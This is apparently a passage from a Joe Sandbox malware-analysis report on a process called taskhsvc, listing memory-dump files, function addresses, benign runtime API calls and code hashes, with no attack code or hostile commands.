Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabort
String ID:
API String ID: 3276312271-0
Opcode ID: d35786cd7d7c6beee3a6a586e7f4d36181708eab27071b48a7f445173c996750
Instruction ID: 0a3eff27b0ca7f0d1dea013b098bf9bc8e66a2807aea9d0c22e178666e3cfeb1
Opcode Fuzzy Hash: d35786cd7d7c6beee3a6a586e7f4d36181708eab27071b48a7f445173c996750
Instruction Fuzzy Hash: 83417CB4A0420ACFCB00DFA9C584AAEBBF0FB48310F198419E855EB351D738E9459BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00ECCF80 Relevance: 3.1, APIs: 2, Instructions: 103COMMON

Download Yara Rule

APIs

Part of subcall function 00E83EC7: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00E866C7), ref: 00E83EFF

abort.MSVCRT ref: 00ECD029
__stack_chk_fail.LIBSSP-0 ref: 00ECD0F7

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort
String ID:
API String ID: 646538096-0
Opcode ID: ab4fc230e740c41972cdf8b346e89f8c990dc7e17d3837a0d8475caae43dbf91
Instruction ID: d0b7a7f366c9587fdf981404147fa9ccf3f50e35b34b0a9d86773109c80100d1
Opcode Fuzzy Hash: ab4fc230e740c41972cdf8b346e89f8c990dc7e17d3837a0d8475caae43dbf91
Instruction Fuzzy Hash: 0B41C374A04209CFDB00DFA8C585BAEBBF5BB08304F149569E898BB351D336D945CF62

Uniqueness

Uniqueness Score: -1.00%

Function 00DC3994 Relevance: 3.1, APIs: 2, Instructions: 87COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00DC39E4

Part of subcall function 00DB8860: abort.MSVCRT ref: 00DB88CA
Part of subcall function 00DB8860: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00DB9EDC), ref: 00DB88DD

Part of subcall function 00DE70D3: abort.MSVCRT ref: 00DE7125
Part of subcall function 00DE70D3: abort.MSVCRT ref: 00DE716C
Part of subcall function 00DE70D3: abort.MSVCRT ref: 00DE71B6

__stack_chk_fail.LIBSSP-0 ref: 00DC3AF8

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: abort$__stack_chk_fail$strrchr
String ID:
API String ID: 1113427550-0
Opcode ID: c17edc2598f2d847fd3f524ac2d8231281b9127a849f803b3b4729c96d733a24
Instruction ID: 30fd0641b1edf4a980ca8424b61e993a4e616fb7dc1dbd9ac0652e2c02ab5bbd
Opcode Fuzzy Hash: c17edc2598f2d847fd3f524ac2d8231281b9127a849f803b3b4729c96d733a24
Instruction Fuzzy Hash: ED31E3B09087469FCB00BFB6C48966EBBF0AF40344F05881DE4E4DB242DB79D555DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00F0C901 Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00F0CC7F), ref: 00F0CA49

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F0CC7F), ref: 00F0C95A

Part of subcall function 00F0C797: abort.MSVCRT ref: 00F0C7F0
Part of subcall function 00F0C797: __stack_chk_fail.LIBSSP-0 ref: 00F0C8C7

Part of subcall function 00F0C8CE: __stack_chk_fail.LIBSSP-0 ref: 00F0C8FA

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abortstrrchr
String ID:
API String ID: 2422377151-0
Opcode ID: 53d12ec98b1244237034de0de8f0580ec50f11b422e4c060b8868231beaf97c8
Instruction ID: baa4379f8ebeda70f6a2a4dee0f1c981660942a2ba697a15273d223f910da5ff
Opcode Fuzzy Hash: 53d12ec98b1244237034de0de8f0580ec50f11b422e4c060b8868231beaf97c8
Instruction Fuzzy Hash: CA31C6B0A083099FDB00EFA9C98565EBBF0BF44754F018A19E494EB381D778D845EF56

Uniqueness

Uniqueness Score: -1.00%

Function 00E55D08 Relevance: 3.1, APIs: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00E55E53

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00E55D5F

Part of subcall function 00DEF792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00DD6074), ref: 00DEF7B2

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Memory Dump Source

Source File: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strrchr$abort
String ID:
API String ID: 1190921433-0
